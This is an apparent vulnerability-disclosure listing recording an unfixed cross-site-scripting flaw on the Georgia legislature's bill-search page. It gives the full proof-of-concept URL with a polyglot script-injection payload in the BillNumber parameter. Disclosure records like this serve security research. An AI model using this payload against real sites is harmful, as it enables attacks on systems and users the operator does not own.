Security researcher gamr, has submitted on 15/04/2009 a cross-site-scripting (XSS) vulnerability affecting www.legis.state.ga.us, which at the time of submission ranked 15796 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/04/2009 |
Date published: 18/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: gamr |
Domain: www.legis.state.ga.us |
Category: XSS |
Pagerank: 15796 |
URL: http://www.legis.state.ga.us/legis/2009_10/billSearch.php?HBMax=1721&HRMax=1721&SBMax=1721&SRMax=172 1&BillType=hb&BillNumber=%27;alert(String.fromCharCode(88,83,83))//%5C%27;alert(String.fromCharCode( 88,83,83))//%22;alert(String.fromCharCode(88,83,83))//%5C%22;alert(String.fromCharCode(88,83,83))//- -%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E |
Click here to view the mirror
|
|
|